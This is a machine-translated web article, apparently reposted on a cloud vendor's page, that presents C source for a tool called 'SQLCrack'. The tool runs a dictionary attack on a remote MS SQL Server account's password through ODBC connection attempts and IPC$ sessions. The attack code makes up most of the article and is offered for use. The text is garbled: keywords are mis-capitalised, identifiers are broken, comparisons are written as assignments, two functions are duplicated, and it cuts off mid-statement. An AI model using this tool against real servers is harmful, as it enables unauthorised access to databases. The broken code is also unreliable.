How to crack the password of MS SQL SERVER

Source: Internet
Author: User
Tags define local mssql server
This article focuses on how to detect the password of the ms SQL SERVER account. The following example describes the entire process of password detection.

// Header file used by the program
// Define global variables

 

Char dict [20000] [40], // The password to be tested
UserName [40], // User Name
Target [40], // target server
Passwd [40]; // the correct password that has been detected
Int total = 0; // number of words in the dictionary
BOOL Cracked = FALSE; // This value is TRUE when the password is successfully tested.
//
// Function: usage
// Function: displays program help information.
//
Void usage ()
{
Printf ("\ nPower by analyzer <〈
[Email] inmiao@163.com [/email]
> 〉"
"\ Nhttp: // www.infocn.com"
"\ NUsage: SQLCrack <ip> <UserName> <dict> <SleepTime [20-1000]>"
"\ NExample: SQLCrack 192.168.0.1 sa c: \ pwd. dic 50 \ n"); return;
}
//
// Function: ReadDic
// Function: read data from the dictionary file, pass it to the global variable dict, and prepare the Test password.
// Description: If the function fails to run, return 1. If the function succeeds, return 0.
//
Int ReadDic (char * dic)
{
FILE * fp;
Char tmp [40];
// Open the dictionary file
If (fp = fopen (dic, "r") = NULL)
{
Printf ("\ nCaN' t open % s ", dic );
Return 1;
}
While (! Feof (fp ))
{
// Read data to temporary variables
If (fgets (tmp, 40, fp) = NULL)
Break;
// Do not forget to remove the last data read from the file from the [line feed symbol]. Otherwise, the password will not be detected.
Strncpy (dict [total], tmp, strlen (tmp)-1 );
Total ++;
// Because dict is defined as dict [20000] [40], if the number of words in the dictionary exceeds 20000, the loop is exited.
// Otherwise it will overflow. you can adjust it on your own
If (total> = 20000)
Break;
}
Fclose (fp );
Return 0;
}
//
// Function: ConnIPC
// Function: Establish an IPC connection
// Description: return value 1 for connection failure and return value 0 for success
//
Int ConnIPC (char * RemoteName)
{
NETRESOURCE nr;
DWORD flags = CONNECT_UPDATE _PROFILE;
Tchar rn [30] = "",
LN [5] = "";
Strcat (RN, RemoteName );
Strcat (RN, "\ ipc $ ");
// Fill in the Data Structure
Nr. dwType = RESOURCETYPE_DISK;
Nr. lpLocalName = (LPTSTR) & LN;
Nr. lpRemoteName = (LPTSTR) & RN;
Nr. lpProvider = NULL;
If (WNetAddConnection2 (& nr, (LPSTR) "", (LPSTR) "", flags) = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function: DelIPC
// Function: disconnect the IPC Session
// Description: the return value is 0. Otherwise, 1 is returned.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
Strcat (lpName, RemoteName );
Strcat (lpName, "\ ipc $ ");
Ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE, TRUE );
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
DWORD WINAPI SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value SCHAR ConnStr [200]; // connectionDatabaseString
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS)
{
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr), szBuffer, sizeof
(SzBuffer), & swStrLen,
SQL _DRIVER_COMPLETE_REQUIRED );
// Printf ("conn ..");
If (retcode! = SQL _SUCCESS & retcode! = SQL _SUCCESS_WITH_INFO)
{
// Connection failed and function terminated
// Printf ("\ nCouldn't connect to % s MSSQL server. \ n", target );
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// The remote MSSQL Server database is successfully connected.
Cracked = TRUE;
Strcpy (passwd, pwd );
// Puts (szBuffer );
// Display the string connecting to the remote database
// Disconnect
SQLDisconnect (hdbc );
// Printf ("disconn ..");
// Release the connection handle
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
// Printf ("free hdbc ..");
// Release the environment handle
SQLFreeHandle (SQL _HANDLE_ENV, henv );
// Printf ("free henv .. \ n ");
Return 0;
}
//
// Function: DelIPC
// Function: disconnect the IPC Session
// Description: the return value is 0. Otherwise, 1 is returned.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
Strcat (lpName, RemoteName );
Strcat (lpName, "\ ipc $"); ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE,
TRUE );
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
Dword winapi SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value
SCHAR ConnStr [200]; // connection string
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS ){
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr ),
SzBuffer, sizeof (szBuffer ),&

Source: jieshiwang

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.